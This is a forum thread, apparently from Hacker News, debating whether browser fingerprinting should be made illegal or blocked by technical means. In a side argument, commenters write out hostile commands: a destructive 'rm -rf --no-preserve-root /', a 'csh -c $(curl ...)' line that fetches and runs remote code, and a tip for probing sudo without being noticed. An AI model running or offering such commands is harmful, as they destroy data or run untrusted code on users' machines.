[qdhqdhqdg]

We should make fingerprinting illegal.

Fingerprinting is an exploit, an attack on the person and machine. It is tracking using mechanisms that were not meant for tracking.

It is without consent and it is without user control (you can clear cookies, you can't clear the fingerprint you've let on thousands of website you browse every week).

Cookies, Local Storage (and IP) should be the only legally authorised means of tracking

[jedberg]

Many websites that make use of this fall outside the jurisdiction of the USA or EU.

It's better to make browsers unfingerprintable than trying to outlaw the practice.

[tgsovlerkhgsel]

Ad slots are often sold and resold through various exchanges, platforms and marketplaces. If each entity in this chain is liable if fingerprinting happens, then fingerprinting will quickly be just as toxic as other kinds of exploits and mostly disappear from the ecosystem.

For a site to be completely out of reach of the US/EU, all of the involved companies (site operator, fingerprinting provider, company paying for the advertising, ad network provider + the other middlemen involved in serving that ad) would have to have zero connection to the US/EU.

[zingplex]

Is there any reason that legislative and technical measures are mutually exclusive?

[jedberg]

No, but as a community we have limited resources, and it makes more sense to focus on the technical solution than the legislative, which is usually a long slow process and never gets done what you want after all the lobbyists get their hands in it.

[smichel17]

I think this is misguided/shortsighted. Politics can always trump technology -- see the rounds of anti-encryption bills currently making the rounds.

Consider what technical success looks like. How many nice things can't we have, if we need to worry about how they will be abused for fingerprinting?

Better to succeed politically and fail technically than the other way around.

[rhizome]

Then again as the saying goes, you can't use technology to fix a people problem.

[novok]

Also intelligence agencies are going to ignore whatever legislation you create.

[smichel17]

That doesn't sound like full political success.

[danielheath]

They use the financial systems in both these jurisdictions, and that’s enough access for both governments to regulate them.

[godelski]

How does this protect from nefarious actors? Shouldn't we (also) find ways to make fingerprinting impossible?

[scrollaway]

Yes and no; it's still a cat and mouse game. You prevent one way, fingerprinters will find another way. And sometimes, the cure may be worse than the disease.

What also makes this a little different is that there's not many nefarious actors that truly benefit from fingerprinting random people. Fingerprinting is very useful in large scale operations, and it's hard to maintain a large scale web presence as an outlaw.

I fully agree that fingerprinting should be outlawed by privacy directives. But writing such a law correctly is really tough.

[godelski]

Yeah I'm all for better privacy laws. Highly in favor actually. But this seems like the type of problem where you can't tackle from a single direction. I have to imagine there is a way to combat many of these tactics (at least enough to make them difficult) but I don't have the faintest clue of how to combat something like canvas fingerprinting which essentially is exploiting the silicon lottery.

I do not think laws go far enough because we live in a global society and laws don't exactly apply globally.

[expect]

Not really. If this large scale operation is run by a government. And law is country-divided mostly.

[tgsovlerkhgsel]

It's really hard to make it impossible for people to kill each other. That's why we put some protections in place where they make sense, but otherwise rely on making it illegal and punishing people who do it anyways.

[doopy1]

It's impossible to get rid of fingerprinting, better to punish when it's actually abused.

[h_anna_h]

Making fingerprinting illegal will solve nothing. GDPR and the cookie law rarely get applied in real life (and when they do the punishment is laughable). The only real solution is a technical one - a browser that respects your privacy.

The only way that I think a law could assist with this would be if the governments would force all websites of legal businesses to work without javascript as well as via tor, but even then it will go unenforced.

That being said, I do not think that fingerprinting is an exploit as browsers come build-in with technologies that are meant for fingerprinting (see the ping attribute for example).

[rhizome]

I don't if I'd call enforcement penalties rare and laughable:

https://www.enforcementtracker.com/?insights

[sim_card_map]

please not another cookie law!

tired of closing useless cookie notifications on every site

[KingMachiavelli]

> It is without consent and it is without user control

How is that true? If you don't visit X site then X site can't fingerprint you. I'd say technically it's the user's fault if they run random code on their computer and using a browser that sends this information back to the fingerprinting party.

I'd say most of the best sites of the internet could be read just fine w/o Javascript or even with just wget.

If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?

[caconym_]

Getting browser-fingerprinted is technically the user’s fault in the same way it’s technically my fault if I die in a car crash because of some mechanical defect that I could have detected if I’d just made a habit of regularly dismantling my car to inspect every part of it, applying expert engineering knowledge to identify and fix any dangerous problem(s) (including design defects).

Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever is something we should avoid if our goal is to build a society for the common good. The whole point is to watch each other’s backs, not to create a web of obscure threats where only the truly paranoid can remain safe and avoid being exploited.

[rhizome]

>Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever

Indeed, a lot of companies are paying a lot of people a lot of money to spend a lot of their working hours figuring out newer and more-resilient ways of doing this stuff. How long has it been since persistent Flash cookies? Looks like sometime around 2009:

https://en.wikipedia.org/wiki/Local_shared_object#Privacy_co...

I think there's a project out there for an enterprising public-interest researcher to graph how many of these attempts and techniques were developed and popularized after Facebook started allowing people outside of universities to register for an account.

[_def]

> If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?

Yes.

[KingMachiavelli]

I'll take that bet. Whatever you do don't run this!

> csh -c $(curl dev.sansorgan.es)

(I specified csh as anyone willing to try this probably wouldn't have it installed).

[LinuxBender]

Remember to test with

  sudo -n

You don't want to give away that you are using sudo to anyone that does not first read the script.

[h_anna_h]

Guess your post is exploiting these that run a script that executes random commands that they find online with root privileges. Better pay up.

[dabbledash]

“If someone gave me the key to their front door so I could drop off amazon packages but I actually used it to come in and destroy all their valuables would it really be MY fault?”

Yes.

[KingMachiavelli]

The action of destroying the valuables is the crime. Writing down instructions on how to destroy them is just speech. If the owner (or someone else) executes those instructions then they are the actor and the responsible party.

[MauranKilom]

But you're not just leaving instructions, you're turning on the water and firing up the stove.

[TylerE]

That sounds like a recipe for the #%#%^#^ GDPR popups but 1000x worse.

[Yver]

Sure, but that's an issue with those websites, not the law. The law doesn't mandate to have a fullscreen modal that says "We value your privacy" with a big button that allows all cookies and myriad tiny buttons to disallow them individually.

If websites choose to sacrifice usability to be able to fingerprint users, that's on them.

[TylerE]

The problem with laws is they never get them right in the first place, and that goes double with anything technology, and then once they are law it is almost impossible to get them changed.